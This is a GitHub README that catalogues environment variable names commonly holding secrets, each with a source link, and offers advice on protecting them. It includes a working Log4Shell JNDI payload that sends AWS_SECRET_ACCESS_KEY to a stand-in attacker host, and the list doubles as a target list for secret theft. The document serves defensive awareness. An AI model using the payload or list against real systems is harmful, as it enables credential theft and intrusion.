List of secrets, passwords, API keys, tokens stored inside a system environment variables.
An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.
Many developer documentations recommends storing secrets inside an environment variable, but is it the best way to keep secrets?
The attacker can read values inside system environment variable by using exploits:
-
CVE-2021-44228 JNDI log4j (JAVA) (Read more...)
${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
Get AWS_SECRET_ACCESS_KEY or return NO_EXISTS
-
CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on Github and Twitter π
-
and much more...
Because of that I created, a list of secrets in environment variables to help secure software.
Some of practices to avoid leak of secrets stored in environment variables is to:
- Block/notify on WAF when the request includes system environment variables
- Store in system environment variable path to a config file, instead of clean value
- Encrypt values inside environment variable
- Use different way to store secrets π€
You can check your system environment variables:
- Windows execute in PowerShell:
dir env:
- Linux/MacOS execute in terminal:
printenv
orenv
- AWS_ACCESS_KEY_ID
- AWS_SECRET_ACCESS_KEY
- AMAZON_AWS_ACCESS_KEY_ID
- AMAZON_AWS_SECRET_ACCESS_KEY
source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html
- ALGOLIA_API_KEY
source: https://www.algolia.com/doc/framework-integration/symfony/getting-started/installation/?client=php
- AZURE_CLIENT_ID
- AZURE_CLIENT_SECRET
- AZURE_USERNAME
- AZURE_PASSWORD
- MSI_ENDPOINT
- MSI_SECRET
source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406
- binance_api
- binance_secret
source: https://algotrading101.com/learn/binance-python-api-guide/
- BITTREX_API_KEY
- BITTREX_API_SECRET
source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md
- CF_PASSWORD
- CF_USERNAME
source: https://cli.cloudfoundry.org/en-US/v6/auth.html
- CODECLIMATE_REPO_TOKEN
source: https://docs.codeclimate.com/docs/command-line-interface
- COVERALLS_REPO_TOKEN
source: https://docs.coveralls.io/supported-ci-services
- CIRCLE_TOKEN
source: https://circleci.com/docs/2.0/api-developers-guide/
- DIGITALOCEAN_ACCESS_TOKEN
source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean
- DOCKER_EMAIL
- DOCKER_PASSWORD
- DOCKER_USERNAME
source: https://github.com/marketplace/actions/publish-docker
- DOCKERHUB_PASSWORD
source: https://circleci.com/docs/2.0/env-vars/
- ITC_PASSWORD
source: https://github.com/phatblat/fastlane-variables
- FACEBOOK_APP_ID
- FACEBOOK_APP_SECRET
- FACEBOOK_ACCESS_TOKEN
- FIREBASE_TOKEN
- FIREBASE_API_TOKEN
source: https://firebase.google.com/docs/cli
- FOSSA_API_KEY
source: https://docs.fossa.com/docs/api-reference
- GH_TOKEN
- GITHUB_TOKEN
- GH_ENTERPRISE_TOKEN
- GITHUB_ENTERPRISE_TOKEN
source: https://cli.github.com/manual/gh_help_environment
- CI_DEPLOY_PASSWORD
- CI_DEPLOY_USER
source: https://docs.gitlab.com/ee/user/project/deploy_tokens/
- GOOGLE_APPLICATION_CREDENTIALS
- GOOGLE_API_KEY
source: https://cloud.google.com/docs/authentication/getting-started#windows
- CI_DEPLOY_USER
- CI_DEPLOY_PASSWORD
- GITLAB_USER_LOGIN
- CI_JOB_JWT
- CI_JOB_JWT_V2
- CI_JOB_TOKEN
source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html
- HEROKU_API_KEY
- HEROKU_API_USER
source: https://devcenter.heroku.com/articles/authentication
- MAILGUN_API_KEY
source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/
- MCLI_PRIVATE_API_KEY
- MCLI_PUBLIC_API_KEY
https://docs.mongodb.com/mongocli/stable/configure/environment-variables/
- NGROK_TOKEN
- NGROK_AUTH_TOKEN
source: -
- NPM_TOKEN
- NPM_AUTH_TOKEN
source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow
- OKTA_CLIENT_ORGURL
- OKTA_CLIENT_TOKEN
- OKTA_OAUTH2_CLIENTSECRET
- OKTA_OAUTH2_CLIENTID
- OKTA_AUTHN_GROUPID
source: https://developer.okta.com/okta-sdk-java/apidocs/com/okta/sdk/client/ClientBuilder.html
- OS_USERNAME
- OS_PASSWORD
source: https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html
source: https://docs.oracle.com/cd/E78305_01/E78304/html/openstack-envars.html
- PERCY_TOKEN
source: https://docs.percy.io/docs/environment-variables
- POSTGRES_PASSWORD
source: https://www.postgresql.org/docs/current/libpq-envars.html
- SAUCE_ACCESS_KEY
- SAUCE_USERNAME
source: https://docs.saucelabs.com/basics/environment-variables/
- SENTRY_AUTH_TOKEN
source: https://docs.sentry.io/product/cli/configuration/
- SLACK_TOKEN
source: https://slack.dev/node-slack-sdk/getting-started
- square_access_token
- square_oauth_secret
source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme
- STRIPE_API_KEY
- STRIPE_DEVICE_NAME
source: https://stripe.com/docs/cli/api_keys
- SURGE_TOKEN
- SURGE_LOGIN
source: https://surge.sh/help/integrating-with-circleci
- TWILIO_ACCOUNT_SID
- TWILIO_AUTH_TOKEN
Source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html
- CONSUMER_KEY
- CONSUMER_SECRET
source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices
- TRAVIS_SUDO
- TRAVIS_OS_NAME
- TRAVIS_SECURE_ENV_VARS
source: https://docs.travis-ci.com/user/environment-variables
- TELEGRAM_BOT_TOKEN
- VAULT_TOKEN
- VAULT_CLIENT_KEY
source: https://www.vaultproject.io/docs/commands
- TOKEN
- VULTR_ACCESS
- VULTR_SECRET
source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops
The repository includes the raw list:
It is auto-generated from README.md by GitHub action.
ππ First off, thanks for taking the time to contribute! ππ
If you would like to add more secrets:
Please read and follow our Contributing guide
Thanks! π¦
- Stackoverflow - Is it secure to store passwords as environment variables (rather than as plain text) in config files?
- Google - Best practices for securely using API keys
- An Introduction to Environment Variables and How to Use Them
- Why you shouldn't use ENV variables for secret data
- The Triumph and Tragedy of .env Files
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.